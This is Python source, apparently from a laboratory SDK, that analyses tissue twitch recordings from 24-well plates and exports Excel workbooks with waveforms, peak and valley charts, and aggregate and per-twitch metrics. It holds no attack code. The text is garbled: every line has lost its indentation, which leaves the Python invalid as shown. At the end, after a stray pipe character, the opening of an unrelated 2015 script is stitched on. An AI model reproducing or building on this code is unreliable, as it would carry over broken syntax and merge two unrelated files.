def _write_xlsx_metadata(workbook: xlsxwriter.workbook.Workbook, first_well_file: WellFile) -> None:
logger.info("Writing H5 file metadata")
metadata_sheet = workbook.add_worksheet(METADATA_EXCEL_SHEET_NAME)
curr_sheet = metadata_sheet
_write_xlsx_recording_metadata(curr_sheet, first_well_file)
if not isinstance(first_well_file, ExcelWellFile):
_write_xlsx_device_metadata(curr_sheet, first_well_file)
_write_xlsx_output_format_metadata(curr_sheet)
# Adjust the column widths to be able to see the data
for iter_column_idx, iter_column_width in ((0, 25), (1, 40), (2, 25)):
curr_sheet.set_column(iter_column_idx, iter_column_idx, iter_column_width)
class PlateRecording(FileManagerPlateRecording):
"""Manages aspects of analyzing a plate recording session."""
def __init__(
self,
*args: Any,
pipeline_template: Optional[PipelineTemplate] = None,
**kwargs: Dict[str, Any],
) -> None:
super().__init__(*args, **kwargs)
self._is_optical_recording = isinstance(self._files[0], ExcelWellFile)
self._workbook: xlsxwriter.workbook.Workbook
self._workbook_formats: Dict[str, Format] = dict()
if pipeline_template is None:
first_well_index = self.get_well_indices()[0]
# this file is used to get general information applicable across the recording
first_well_file = self.get_well_by_index(first_well_index)
tissue_sampling_period = (
first_well_file.get_tissue_sampling_period_microseconds() / MICROSECONDS_PER_CENTIMILLISECOND
)
noise_filter_uuid = (
None if self._is_optical_recording else TSP_TO_DEFAULT_FILTER_UUID[tissue_sampling_period]
)
twitches_point_up = True # Anna (04/22/2021): defaults to force data in which the twitches point up since the current data in the SDK is force metrics
if self._is_optical_recording:
twitches_point_up = first_well_file.get_twitches_point_up()
pipeline_template = PipelineTemplate(
tissue_sampling_period=tissue_sampling_period,
noise_filter_uuid=noise_filter_uuid,
is_force_data=twitches_point_up,
is_magnetic_data=not self._is_optical_recording,
)
self._pipeline_template = pipeline_template
self._pipelines: Dict[int, Pipeline]
self._interpolated_data_period: float
@classmethod
def from_directory(cls, dir_to_load_files_from: str) -> Iterator["PlateRecording"]:
"""Load well data from given directory.
Args:
dir_to_load_files_from: directory where well data exists
Returns:
list of PlateRecording objects
"""
recordings = []
# get list of files in directory
zip_file_items = [
f for f in os.listdir(dir_to_load_files_from) if not f.startswith(".") if f.endswith(".zip")
]
h5_file_items = [
"/".join([dir_to_load_files_from, f])
for f in os.listdir(dir_to_load_files_from)
if not f.startswith(".")
if f.endswith(".h5")
]
excel_file_items = [
"/".join([dir_to_load_files_from, f])
for f in os.listdir(dir_to_load_files_from)
if not f.startswith(".")
if f.endswith(".xlsx")
]
# iterate over zipped files
if len(zip_file_items) > 0:
for zip_file in zip_file_items:
plate_recording = cls._load_zip_file(dir_to_load_files_from, zip_file)
recordings.append(plate_recording)
# load h5 files
if len(h5_file_items) > 0:
plate_recording = cls(h5_file_items)
recordings.append(plate_recording)
# load excel files
if len(excel_file_items) > 0:
optical_well_files = [
ExcelWellFile(os.path.join(dir_to_load_files_from, excel_file_items))
for excel_file_items in excel_file_items
]
plate_recording = cls(optical_well_files)
recordings.append(plate_recording)
msg = f"Found recordings from {len(recordings)} plate(s)."
logger.info(msg)
for plate in recordings:
yield plate
@classmethod
def _load_zip_file(cls, dir_to_load_files_from: str, file_name: str) -> Union["PlateRecording", Any]:
"""Load indiviual zip file.
Assumes that the zip file only contains .h5 or .xlsx files and is not a nested directory structure.
Args:
dir_to_load_files_from: directory where data files exist
file_name: single file path
Returns:
PlateRecording object
"""
# get path of first item in list
path_to_zip_file = os.path.join(dir_to_load_files_from, file_name)
tmpdir = tempfile.mkdtemp()
# load the first item in list
# assumes first item contains list of .h5 or .xlsx files
with zipfile.ZipFile(path_to_zip_file, "r") as zip_ref:
members = [
member
for member in zip_ref.namelist()
if (member.endswith(".h5") or member.endswith(".xlsx")) and "__MACOSX" not in member
# Tanner (10/1/20): "__MACOSX" is an artifact of zipping a file on MacOS that is not
# needed by the SDK. This is likely not a typical use case, but this prevents problems in
# case a user does zip their files on Mac
]
# extract zip file contents to tmpdir
zip_ref.extractall(path=tmpdir, members=members)
# Kristian (9/6/21): for some reason, zip files are not extracted in tmpdir, but in a directory
# in tmpdir that is named based on zipped file name
if any("/" in member for member in members):
tmpnest = "/".join([tmpdir, members[0].split("/")[0]])
else:
tmpnest = tmpdir
if any(member.endswith(".xlsx") for member in members):
excel_members = ["/".join([tmpdir, excel_file_item]) for excel_file_item in members]
optical_well_files = [ExcelWellFile(excel_member) for excel_member in excel_members]
return cls(optical_well_files)
return super().from_directory(tmpnest)
def _init_pipelines(self) -> None:
try:
self._pipelines # pylint:disable=pointless-statement # Eli (9/11/20): this will cause the attribute error to be raised if the pipelines haven't yet been initialized
return
except AttributeError:
pass
self._pipelines = dict()
num_wells = len(self.get_well_indices())
for i, iter_well_idx in enumerate(self.get_well_indices()):
iter_pipeline = self.get_pipeline_template().create_pipeline()
well = self.get_well_by_index(iter_well_idx)
well_name = TWENTY_FOUR_WELL_PLATE.get_well_name_from_well_index(iter_well_idx)
msg = f"Loading tissue and reference data... {int(round(i / num_wells, 2) * 100)}% (Well {well_name}, {i + 1} out of {num_wells})"
logger.info(msg)
raw_tissue_reading = well.get_raw_tissue_reading()
if self._is_optical_recording:
raw_tissue_reading[0] *= CENTIMILLISECONDS_PER_SECOND
iter_pipeline.load_raw_magnetic_data(raw_tissue_reading, well.get_raw_reference_reading())
self._pipelines[iter_well_idx] = iter_pipeline
def get_pipeline_template(self) -> PipelineTemplate:
return self._pipeline_template
def get_reference_magnetic_data(self, well_idx: int) -> NDArray[(2, Any), int]:
self._init_pipelines()
return self._pipelines[well_idx].get_raw_reference_magnetic_data()
def create_stacked_plot(self) -> Figure:
"""Create a stacked plot of all wells in the recording."""
# Note Eli (9/11/20): this is hardcoded for a very specific use case at the moment and just visually tested using the newly evolving visual regression tool
self._init_pipelines()
factor = 0.25
plt.figure(figsize=(15 * factor, 35 * 1), dpi=300)
ax1 = plt.subplot(24, 1, 1)
ax1.set(ylabel="A1")
plt.setp(ax1.get_xticklabels(), visible=False)
count = 0
for _, iter_pipeline in self._pipelines.items():
if count == 0:
pass
else:
iter_ax = plt.subplot(24, 1, count + 1, sharex=ax1)
iter_ax.set(ylabel=TWENTY_FOUR_WELL_PLATE.get_well_name_from_well_index(count))
if count != 23:
plt.setp(iter_ax.get_xticklabels(), visible=False)
else:
iter_ax.set(xlabel="Time (seconds)")
filtered_data = iter_pipeline.get_noise_filtered_magnetic_data()
plt.plot(filtered_data[0] / CENTIMILLISECONDS_PER_SECOND, filtered_data[1], linewidth=0.5)
# plt.plot(filtered_data[0,:int(30*CENTIMILLISECONDS_PER_SECOND/960)]/CENTIMILLISECONDS_PER_SECOND,filtered_data[1,:int(30*CENTIMILLISECONDS_PER_SECOND/960)])
count += 1
return plt.gcf()
def write_xlsx(
self,
file_dir: str,
file_name: Optional[str] = None,
create_continuous_waveforms: bool = True,
create_waveform_charts: bool = True,
twitch_width_values: Tuple[int, ...] = (10, 25, 50, 75, 90),
show_twitch_coordinate_values: bool = False,
show_twitch_time_diff_values: bool = False,
) -> None:
"""Create an XLSX file.
Args:
file_dir: the directory in which to create the file.
file_name: By default an automatic name is generated based on barcode and recording date. Extension will always be xlsx---if user provides something else then it is stripped
create_continuous_waveforms: typically used in unit testing, if set to True, the continuous-waveforms sheet and continuous-waveform-plots sheet will be created with no content
create_waveform_charts: typically used in unit testing, if set to True, only the continuous-waveform-plots sheet will be created with no content
twitch_width_values: a Tuple indicating which twitch width values should be included on the xlsx sheet, if none is given default to all.
show_twitch_coordinate_values: a boolean indicating whether or not to show the twitch coordinates, if none defaults to false. If true, it will have to same coordinate values as twitch_width_values
show_twitch_time_diff_values: a boolean indicating whether or not to show the twitch timepoint difference values, if none defaults to false. If true, it will have to same coordinate values as twitch_width_values
"""
first_well_index = self.get_well_indices()[0]
# this file is used to get general information applicable across the recording
first_well_file = self.get_well_by_index(first_well_index)
logger.info("Loading data from H5 file(s)")
self._init_pipelines()
if file_name is None:
file_name = f"{first_well_file.get_plate_barcode()}__{first_well_file.get_begin_recording().strftime('%Y_%m_%d_%H%M%S')}.xlsx"
file_path = os.path.join(file_dir, file_name)
logger.info("Opening .xlsx file")
self._workbook = Workbook(file_path, {"default_date_format": "YYYY-MM-DD hh:mm:ss UTC"})
for iter_format_name, iter_format in ALL_FORMATS.items():
self._workbook_formats[iter_format_name] = self._workbook.add_format(iter_format)
_write_xlsx_metadata(self._workbook, first_well_file)
self._write_xlsx_continuous_waveforms(
skip_content=(not create_continuous_waveforms),
skip_charts=(not create_waveform_charts),
)
self._write_xlsx_aggregate_metrics(twitch_width_values)
twitch_coordinate_values: Tuple[int, ...]
twitch_coordinate_values = ()
twitch_time_diff_values: Tuple[int, ...]
twitch_time_diff_values = ()
if show_twitch_coordinate_values:
twitch_coordinate_values = twitch_width_values
if show_twitch_time_diff_values:
twitch_time_diff_values = twitch_width_values
self._write_xlsx_per_twitch_metrics(
twitch_width_values, twitch_coordinate_values, twitch_time_diff_values
)
logger.info("Saving .xlsx file")
self._workbook.close() # This is actually when the file gets written to d
logger.info("Done writing to .xlsx")
def _write_xlsx_continuous_waveforms(self, skip_content: bool = False, skip_charts: bool = False) -> None:
# pylint: disable-msg=too-many-locals
continuous_waveform_sheet = self._workbook.add_worksheet(CONTINUOUS_WAVEFORM_SHEET_NAME)
self._workbook.add_worksheet(SNAPSHOT_CHART_SHEET_NAME)
self._workbook.add_worksheet(FULL_CHART_SHEET_NAME)
if skip_content:
return
logger.info("Creating waveform data sheet")
curr_sheet = continuous_waveform_sheet
# create headings
curr_sheet.write(0, 0, "Time (seconds)")
for i in range(TWENTY_FOUR_WELL_PLATE.row_count * TWENTY_FOUR_WELL_PLATE.column_count):
name_to_write = (
f"{TWENTY_FOUR_WELL_PLATE.get_well_name_from_well_index(i)} - Active Twitch Force (μN)"
)
curr_sheet.write(0, 1 + i, name_to_write)
# initialize time values (use longest data)
max_time_index = 0
for well_index in self.get_well_indices():
well_pipeline = self._pipelines[well_index]
last_time_index = well_pipeline.get_raw_tissue_magnetic_data()[0][-1]
if last_time_index > max_time_index:
max_time_index = last_time_index
self._interpolated_data_period = (
int(self._files[0].get_interpolation_value() / MICROSECONDS_PER_CENTIMILLISECOND)
if self._is_optical_recording
else INTERPOLATED_DATA_PERIOD_CMS
)
interpolated_data_indices = np.arange(
self._interpolated_data_period, # don't start at time zero, because some wells don't have data at exactly zero (causing interpolation to fail), so just start at the next timepoint
max_time_index,
self._interpolated_data_period,
)
for i, data_index in enumerate(interpolated_data_indices):
# display in seconds in the Excel sheet
seconds = data_index / CENTIMILLISECONDS_PER_SECOND
curr_sheet.write(i + 1, 0, seconds)
# add data for valid wells
well_indices = self.get_well_indices()
num_wells = len(well_indices)
for iter_well_idx, well_index in enumerate(well_indices):
filtered_data = self._pipelines[well_index].get_force()
# interpolate data (at 100 Hz for H5) to max valid interpolated data point
interpolated_data_function = interpolate.interp1d(filtered_data[0], filtered_data[1])
well_name = TWENTY_FOUR_WELL_PLATE.get_well_name_from_well_index(well_index)
msg = f"Writing waveform data of well {well_name} ({iter_well_idx + 1} out of {num_wells})"
logger.info(msg)
# finding last index in interpolated data indices
first_index, last_index = 0, len(interpolated_data_indices) - 1
# decrementing the last index marker until the last time point in filtered_data is greater than the value of interpolated_data_indices at the last index
while filtered_data[0][-1] < interpolated_data_indices[last_index]:
last_index -= 1
# incrementing last_index so the previously found index value less than the last filtered_data timepoint is included in the interpolate function and represnts the correct number of data points
last_index += 1
while filtered_data[0][0] > interpolated_data_indices[first_index]:
first_index += 1
interpolated_data = interpolated_data_function(interpolated_data_indices[first_index:last_index])
if not self._is_optical_recording: # flip magnetic data waveform
interpolated_data *= -1
minimum_value = min(interpolated_data)
interpolated_data -= minimum_value
interpolated_data *= MICRO_TO_BASE_CONVERSION
# write to sheet
for i, data_point in enumerate(interpolated_data):
curr_sheet.write(i + 1, well_index + 1, data_point)
self._create_waveform_charts(
skip_charts,
iter_well_idx,
last_index,
well_index,
well_name,
filtered_data[0],
interpolated_data_function,
minimum_value,
)
# The formatting items below are not explicitly unit-tested...not sure the best way to do this
# Adjust the column widths to be able to see the data
curr_sheet.set_column(0, 0, 18)
well_indices = self.get_well_indices()
for iter_well_idx in range(24):
curr_sheet.set_column(
iter_well_idx + 1,
iter_well_idx + 1,
13,
options={"hidden": iter_well_idx not in well_indices},
)
curr_sheet.freeze_panes(1, 1)
# pylint: disable=too-many-locals
def _create_waveform_charts(
self,
skip_charts: bool,
iter_well_idx: int,
num_data_points: int,
well_index: int,
well_name: str,
time_values: NDArray[(2, Any), int],
interpolated_data_function: interpolate.interpolate.interp1d,
minimum_value: float,
) -> None:
snapshot_chart_sheet = self._workbook.get_worksheet_by_name(SNAPSHOT_CHART_SHEET_NAME)
full_chart_sheet = self._workbook.get_worksheet_by_name(FULL_CHART_SHEET_NAME)
msg = f"Creating chart of waveform data of well {well_name}"
logger.info(msg)
snapshot_chart = None
full_chart = None
if not skip_charts:
snapshot_chart = self._workbook.add_chart({"type": "scatter", "subtype": "straight"})
full_chart = self._workbook.add_chart({"type": "scatter", "subtype": "straight"})
well_column = xl_col_to_name(well_index + 1)
recording_stop_time = time_values[-1] // CENTIMILLISECONDS_PER_SECOND
lower_x_bound = (
0
if recording_stop_time <= CHART_WINDOW_NUM_SECONDS
else int((recording_stop_time - CHART_WINDOW_NUM_SECONDS) // 2)
)
upper_x_bound = (
recording_stop_time
if recording_stop_time <= CHART_WINDOW_NUM_SECONDS
else int((recording_stop_time + CHART_WINDOW_NUM_SECONDS) // 2)
)
msg = f"Adding peak and valley markers to chart of well {well_name}"
logger.info(msg)
for chart, chart_sheet in ((snapshot_chart, snapshot_chart_sheet), (full_chart, full_chart_sheet)):
if chart is not None: # Tanner (11/11/20): chart is None when skipping chart creation
chart.add_series(
{
"name": "Waveform Data",
"categories": f"='continuous-waveforms'!$A$2:$A${num_data_points}",
"values": f"='continuous-waveforms'!${well_column}$2:${well_column}${num_data_points}",
"line": {"color": "#1B9E77"},
}
)
peak_indices, valley_indices = self._pipelines[well_index].get_peak_detection_results()
self._add_peak_detection_series(
chart,
"Peak",
well_index,
well_name,
num_data_points,
peak_indices,
interpolated_data_function,
time_values,
minimum_value,
)
self._add_peak_detection_series(
chart,
"Valley",
well_index,
well_name,
num_data_points,
valley_indices,
interpolated_data_function,
time_values,
minimum_value,
)
if chart is None: # Tanner (11/11/20): chart is None when skipping chart creation
continue
(well_row, well_col) = TWENTY_FOUR_WELL_PLATE.get_row_and_column_from_well_index(well_index)
x_axis_settings: Dict[str, Any] = {"name": "Time (seconds)"}
if chart == snapshot_chart:
x_axis_settings["min"] = lower_x_bound
x_axis_settings["max"] = upper_x_bound
else:
x_axis_settings["min"] = 0
x_axis_settings["max"] = recording_stop_time
chart.set_x_axis(x_axis_settings)
y_axis_label = (
"Post Displacement (microns)" if self._is_optical_recording else "Active Twitch Force (μN)"
)
chart.set_y_axis({"name": y_axis_label, "major_gridlines": {"visible": 0}})
width = (
CHART_FIXED_WIDTH
if chart == snapshot_chart
else CHART_FIXED_WIDTH // 2
+ (DEFAULT_CELL_WIDTH * int(recording_stop_time / SECONDS_PER_CELL))
)
chart.set_size({"width": width, "height": CHART_HEIGHT})
chart.set_title({"name": f"Well {well_name}"})
if chart == snapshot_chart:
chart_sheet.insert_chart(
1 + well_row * (CHART_HEIGHT_CELLS + 1),
1 + well_col * (CHART_FIXED_WIDTH_CELLS + 1),
chart,
)
else:
chart_sheet.insert_chart(
1 + iter_well_idx * (CHART_HEIGHT_CELLS + 1),
1,
chart,
)
def _add_peak_detection_series(
self,
waveform_chart: xlsxwriter.chart_scatter.ChartScatter,
detector_type: str,
well_index: int,
well_name: str,
upper_x_bound_cell: int,
indices: NDArray[(1, Any), int],
interpolated_data_function: interpolate.interpolate.interp1d,
time_values: NDArray[(2, Any), int],
minimum_value: float,
) -> None:
label = "Relaxation" if detector_type == "Valley" else "Contraction"
offset = 1 if detector_type == "Valley" else 0
marker_color = "#D95F02" if detector_type == "Valley" else "#7570B3"
continuous_waveform_sheet = self._workbook.get_worksheet_by_name(CONTINUOUS_WAVEFORM_SHEET_NAME)
result_column = xl_col_to_name(PEAK_VALLEY_COLUMN_START + (well_index * 2) + offset)
continuous_waveform_sheet.write(f"{result_column}1", f"{well_name} {detector_type} Values")
for idx in indices:
idx_time = time_values[idx] / CENTIMILLISECONDS_PER_SECOND
shifted_idx_time = idx_time - time_values[0] / CENTIMILLISECONDS_PER_SECOND
uninterpolated_time_seconds = round(idx_time, 2)
shifted_time_seconds = round(shifted_idx_time, 2)
if self._is_optical_recording:
row = int(
shifted_time_seconds * CENTIMILLISECONDS_PER_SECOND / self._interpolated_data_period
)
value = (
interpolated_data_function(uninterpolated_time_seconds * CENTIMILLISECONDS_PER_SECOND)
- minimum_value
) * MICRO_TO_BASE_CONVERSION
else:
row = shifted_time_seconds * int(1 / INTERPOLATED_DATA_PERIOD_SECONDS) + 1
interpolated_data = interpolated_data_function(
uninterpolated_time_seconds * CENTIMILLISECONDS_PER_SECOND
)
interpolated_data *= -1 # magnetic waveform is flipped
interpolated_data -= minimum_value
value = interpolated_data * MICRO_TO_BASE_CONVERSION
continuous_waveform_sheet.write(f"{result_column}{row}", value)
if waveform_chart is not None: # Tanner (11/11/20): chart is None when skipping chart creation
waveform_chart.add_series(
{
"name": label,
"categories": f"='continuous-waveforms'!$A$2:$A${upper_x_bound_cell}",
"values": f"='continuous-waveforms'!${result_column}$2:${result_column}${upper_x_bound_cell}",
"marker": {
"type": "circle",
"size": 8,
"border": {"color": marker_color, "width": 1.5},
"fill": {"none": True},
},
"line": {"none": True},
}
)
def _write_xlsx_per_twitch_metrics(
self,
twitch_width_values: Tuple[int, ...],
twitch_coordinate_values: Tuple[int, ...],
twitch_time_diff_values: Tuple[int, ...],
) -> None:
logger.info("Creating per-twitch metrics sheet")
curr_sheet = self._workbook.add_worksheet(PER_TWITCH_METRICS_SHEET_NAME)
self._workbook.add_worksheet(TWITCH_FREQUENCIES_CHART_SHEET_NAME)
self._workbook.add_worksheet(FORCE_FREQUENCY_RELATIONSHIP_SHEET)
curr_row = 0
well_indices = self.get_well_indices()
for iter_well_idx in range(TWENTY_FOUR_WELL_PLATE.row_count * TWENTY_FOUR_WELL_PLATE.column_count):
well_name = TWENTY_FOUR_WELL_PLATE.get_well_name_from_well_index(iter_well_idx)
curr_sheet.write(curr_row, 0, well_name)
if iter_well_idx in well_indices:
iter_pipeline = self._pipelines[iter_well_idx]
error_msg = ""
try:
(per_twitch_dict, aggregate_metrics_dict) = iter_pipeline.get_force_data_metrics()
except PeakDetectionError as e:
error_msg = "Error: "
if isinstance(e, TwoPeaksInARowError):
error_msg += "Two Contractions in a Row Detected"
elif isinstance(e, TwoValleysInARowError):
error_msg += "Two Relaxations in a Row Detected"
elif isinstance(e, TooFewPeaksDetectedError):
error_msg += "Not Enough Twitches Detected"
else:
raise NotImplementedError("Unknown PeakDetectionError") from e
curr_sheet.write(curr_row, 1, "N/A")
curr_sheet.write(curr_row + 1, 1, error_msg)
else:
filtered_data = iter_pipeline.get_force()[1]
force_minimum_value = min(filtered_data) * MICRO_TO_BASE_CONVERSION
number_twitches = aggregate_metrics_dict[AMPLITUDE_UUID]["n"]
curr_row = _write_per_twitch_metric_values(
curr_sheet,
curr_row,
per_twitch_dict,
number_twitches,
twitch_width_values,
twitch_coordinate_values,
force_minimum_value,
twitch_time_diff_values,
)
twitch_timepoints = list(per_twitch_dict)
self._create_frequency_vs_time_charts(
iter_well_idx, well_name, number_twitches, twitch_timepoints
)
self._create_force_frequency_relationship_charts(
iter_well_idx, well_name, number_twitches
)
curr_row += 1
curr_sheet.write(curr_row, 0, "Timepoint of Twitch Contraction")
curr_row += 1
curr_row = _write_per_twitch_metric_labels(
curr_sheet,
curr_row,
twitch_width_values,
twitch_coordinate_values,
twitch_time_diff_values,
)
curr_row += (
NUMBER_OF_PER_TWITCH_METRICS
- len(CALCULATED_METRIC_DISPLAY_NAMES)
- len(twitch_width_values)
- (4 * len(twitch_coordinate_values))
- (2 * len(twitch_time_diff_values))
) # include a single row gap in between the data for each well
def _create_force_frequency_relationship_charts(
self,
well_index: int,
well_name: str,
num_data_points: int,
) -> None:
force_frequency_sheet = self._workbook.get_worksheet_by_name(FORCE_FREQUENCY_RELATIONSHIP_SHEET)
msg = f"Creating chart of force-frequency data of well {well_name}"
logger.info(msg)
force_frequency_chart = self._workbook.add_chart({"type": "scatter"})
well_row = well_index * (NUMBER_OF_PER_TWITCH_METRICS + 2)
last_column = xl_col_to_name(num_data_points)
force_frequency_chart.add_series(
{
"categories": f"='{PER_TWITCH_METRICS_SHEET_NAME}'!$B${well_row + 4}:${last_column}${well_row + 4}",
"values": f"='{PER_TWITCH_METRICS_SHEET_NAME}'!$B${well_row + 5}:${last_column}${well_row + 5}",
}
)
force_frequency_chart.set_legend({"none": True})
x_axis_label = CALCULATED_METRIC_DISPLAY_NAMES[TWITCH_FREQUENCY_UUID]
force_frequency_chart.set_x_axis({"name": x_axis_label})
y_axis_label = CALCULATED_METRIC_DISPLAY_NAMES[AMPLITUDE_UUID]
force_frequency_chart.set_y_axis({"name": y_axis_label, "major_gridlines": {"visible": 0}})
force_frequency_chart.set_size({"width": CHART_FIXED_WIDTH, "height": CHART_HEIGHT})
force_frequency_chart.set_title({"name": f"Well {well_name}"})
well_row, well_col = TWENTY_FOUR_WELL_PLATE.get_row_and_column_from_well_index(well_index)
force_frequency_sheet.insert_chart(
1 + well_row * (CHART_HEIGHT_CELLS + 1),
1 + well_col * (CHART_FIXED_WIDTH_CELLS + 1),
force_frequency_chart,
)
def _create_frequency_vs_time_charts(
self,
well_index: int,
well_name: str,
num_data_points: int,
time_values: NDArray[(1, Any), int],
) -> None:
frequency_chart_sheet = self._workbook.get_worksheet_by_name(TWITCH_FREQUENCIES_CHART_SHEET_NAME)
msg = f"Creating chart of frequency data of well {well_name}"
logger.info(msg)
frequency_chart = self._workbook.add_chart({"type": "scatter"})
well_row = well_index * (NUMBER_OF_PER_TWITCH_METRICS + 2)
last_column = xl_col_to_name(num_data_points)
frequency_chart.add_series(
{
"categories": f"='{PER_TWITCH_METRICS_SHEET_NAME}'!$B${well_row + 2}:${last_column}${well_row + 2}",
"values": f"='{PER_TWITCH_METRICS_SHEET_NAME}'!$B${well_row + 4}:${last_column}${well_row + 4}",
}
)
frequency_chart.set_legend({"none": True})
x_axis_settings: Dict[str, Any] = {"name": "Time (seconds)"}
x_axis_settings["min"] = 0
x_axis_settings["max"] = time_values[-1] // CENTIMILLISECONDS_PER_SECOND
frequency_chart.set_x_axis(x_axis_settings)
y_axis_label = CALCULATED_METRIC_DISPLAY_NAMES[TWITCH_FREQUENCY_UUID]
frequency_chart.set_y_axis({"name": y_axis_label, "min": 0, "major_gridlines": {"visible": 0}})
frequency_chart.set_size({"width": CHART_FIXED_WIDTH, "height": CHART_HEIGHT})
frequency_chart.set_title({"name": f"Well {well_name}"})
well_row, well_col = TWENTY_FOUR_WELL_PLATE.get_row_and_column_from_well_index(well_index)
frequency_chart_sheet.insert_chart(
1 + well_row * (CHART_HEIGHT_CELLS + 1),
1 + well_col * (CHART_FIXED_WIDTH_CELLS + 1),
frequency_chart,
)
def _write_xlsx_aggregate_metrics(self, twitch_width_values: Tuple[int, ...]) -> None:
logger.info("Creating aggregate metrics sheet")
curr_sheet = self._workbook.add_worksheet(AGGREGATE_METRICS_SHEET_NAME)
curr_row = 0
for iter_well_idx in range(TWENTY_FOUR_WELL_PLATE.row_count * TWENTY_FOUR_WELL_PLATE.column_count):
curr_sheet.write(
curr_row,
2 + iter_well_idx,
TWENTY_FOUR_WELL_PLATE.get_well_name_from_well_index(iter_well_idx),
)
curr_row += 1
curr_sheet.write(curr_row, 1, "Treatment Description")
curr_row += 1
curr_sheet.write(curr_row, 1, "n (twitches)")
well_indices = self.get_well_indices()
for iter_well_idx in well_indices:
iter_pipeline = self._pipelines[iter_well_idx]
error_msg = ""
try:
_, aggregate_metrics_dict = iter_pipeline.get_force_data_metrics()
except PeakDetectionError as e:
error_msg = "Error: "
if isinstance(e, TwoPeaksInARowError):
error_msg += "Two Contractions in a Row Detected"
elif isinstance(e, TwoValleysInARowError):
error_msg += "Two Relaxations in a Row Detected"
elif isinstance(e, TooFewPeaksDetectedError):
error_msg += "Not Enough Twitches Detected"
else:
raise NotImplementedError("Unknown PeakDetectionError") from e
curr_sheet.write(curr_row, 2 + iter_well_idx, "N/A")
curr_sheet.write(curr_row + 1, 2 + iter_well_idx, error_msg)
else:
curr_sheet.write(
curr_row,
2 + iter_well_idx,
aggregate_metrics_dict[AMPLITUDE_UUID]["n"],
)
curr_row += 1
# row_where_data_starts=curr_row
for iter_metric_uuid, iter_metric_name in CALCULATED_METRIC_DISPLAY_NAMES.items():
if iter_metric_uuid == TIME_DIFFERENCE_UUID:
continue
curr_row += 1
new_row = self._write_submetrics(
curr_sheet,
curr_row,
iter_metric_uuid,
iter_metric_name,
)
curr_row = new_row
for twitch_width_percent_value in TWITCH_WIDTH_METRIC_DISPLAY_NAMES:
if twitch_width_percent_value in twitch_width_values:
twitch_width_percent_info = (
twitch_width_percent_value,
TWITCH_WIDTH_METRIC_DISPLAY_NAMES[twitch_width_percent_value],
)
curr_row += 1
new_row = self._write_submetrics(
curr_sheet,
curr_row,
WIDTH_UUID,
twitch_width_percent_info,
)
curr_row = new_row
# write aggregate statistics for time-to-peak from contraction / relaxation
if TIME_DIFFERENCE_UUID in CALCULATED_METRIC_DISPLAY_NAMES:
for difference_uuid in [CONTRACTION_TIME_UUID, RELAXATION_TIME_UUID]:
if difference_uuid == CONTRACTION_TIME_UUID:
display_names = CONTRACTION_TIME_DIFFERENCE_DISPLAY_NAMES
elif difference_uuid == RELAXATION_TIME_UUID:
display_names = RELAXATION_TIME_DIFFERENCE_DISPLAY_NAMES
for twitch_width_percent_value in twitch_width_values:
if twitch_width_percent_value in twitch_width_values:
twitch_time_diff_info = (
twitch_width_percent_value,
display_names[twitch_width_percent_value],
)
curr_row += 1
new_row = self._write_submetrics(
curr_sheet, curr_row, difference_uuid, twitch_time_diff_info
)
curr_row = new_row
# The formatting items below are not explicitly unit-tested...not sure the best way to do this
# Adjust the column widths to be able to see the data
for iter_column_idx, iter_column_width in ((0, 40), (1, 25)):
curr_sheet.set_column(iter_column_idx, iter_column_idx, iter_column_width)
# adjust widths of well columns
for iter_column_idx in range(24):
curr_sheet.set_column(
iter_column_idx + 2,
iter_column_idx + 2,
19,
options={"hidden": iter_column_idx not in well_indices},
)
curr_sheet.freeze_panes(2, 2)
def _write_submetrics(
self,
curr_sheet: xlsxwriter.worksheet.Worksheet,
curr_row: int,
iter_metric_uuid: uuid.UUID,
iter_metric_name: Union[str, Tuple[int, str]],
) -> int:
submetrics = ("Mean", "StDev", "CoV", "SEM", "Min", "Max")
if isinstance(iter_metric_name, tuple):
iter_width_percent, iter_metric_name = iter_metric_name
curr_sheet.write(curr_row, 0, iter_metric_name)
for iter_sub_metric_name in submetrics:
msg = f"Writing {iter_sub_metric_name} of {iter_metric_name}"
logger.info(msg)
curr_sheet.write(curr_row, 1, iter_sub_metric_name)
well_indices = self.get_well_indices()
for well_index in well_indices:
value_to_write: Optional[Union[float, int, str]] = None
cell_format: Optional[Format] = None
iter_pipeline = self._pipelines[well_index]
try:
(_, aggregate_metrics_dict) = iter_pipeline.get_force_data_metrics()
except PeakDetectionError:
value_to_write = "N/A"
else:
metrics_dict = dict()
if iter_metric_uuid in (WIDTH_UUID, RELAXATION_TIME_UUID, CONTRACTION_TIME_UUID):
metrics_dict = aggregate_metrics_dict[iter_metric_uuid][iter_width_percent]
else:
metrics_dict = aggregate_metrics_dict[iter_metric_uuid]
if iter_sub_metric_name == "Mean":
value_to_write = metrics_dict["mean"]
elif iter_sub_metric_name == "StDev":
value_to_write = metrics_dict["std"]
elif iter_sub_metric_name == "Max":
value_to_write = metrics_dict["max"]
elif iter_sub_metric_name == "Min":
value_to_write = metrics_dict["min"]
elif iter_sub_metric_name == "CoV":
if metrics_dict["std"] is not None and metrics_dict["mean"] is not None:
value_to_write = metrics_dict["std"] / metrics_dict["mean"]
else:
value_to_write = None
cell_format = self._workbook_formats["CoV"]
elif iter_sub_metric_name == "SEM":
if metrics_dict["std"] is not None:
value_to_write = metrics_dict["std"] / metrics_dict["n"] ** 0.5
else:
value_to_write = None
else:
raise NotImplementedError(f"Unrecognized submetric name: {iter_sub_metric_name}")
if iter_metric_uuid == AMPLITUDE_UUID:
if not isinstance(value_to_write, float):
raise NotImplementedError(
f"The value under key {AMPLITUDE_UUID} must be a float."
)
if (
iter_sub_metric_name != "CoV"
): # coefficients of variation are %, not a raw time unit
value_to_write *= MICRO_TO_BASE_CONVERSION
if iter_metric_uuid in (
TWITCH_PERIOD_UUID,
WIDTH_UUID,
IRREGULARITY_INTERVAL_UUID,
RELAXATION_TIME_UUID,
CONTRACTION_TIME_UUID,
):
# for time-based metrics, convert from centi-milliseconds to seconds before writing to Excel
if (iter_sub_metric_name != "CoV") and value_to_write is not None:
# coefficients of variation are %, not a raw time unit
value_to_write /= CENTIMILLISECONDS_PER_SECOND
if iter_metric_uuid in (CONTRACTION_VELOCITY_UUID, RELAXATION_VELOCITY_UUID):
# for velocity-based metrics, convert from centi-milliseconds to seconds before writing to Excel
if iter_sub_metric_name != "CoV":
# coefficients of variation are %, not a raw time unit
value_to_write *= CENTIMILLISECONDS_PER_SECOND * MICRO_TO_BASE_CONVERSION
try:
curr_sheet.write(curr_row, 2 + well_index, value_to_write, cell_format)
except TypeError:
pass
curr_row += 1
return curr_row
|
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 5 10:31:35 2015
@author: gferry
"""
import pandas as pd
import numpy as np
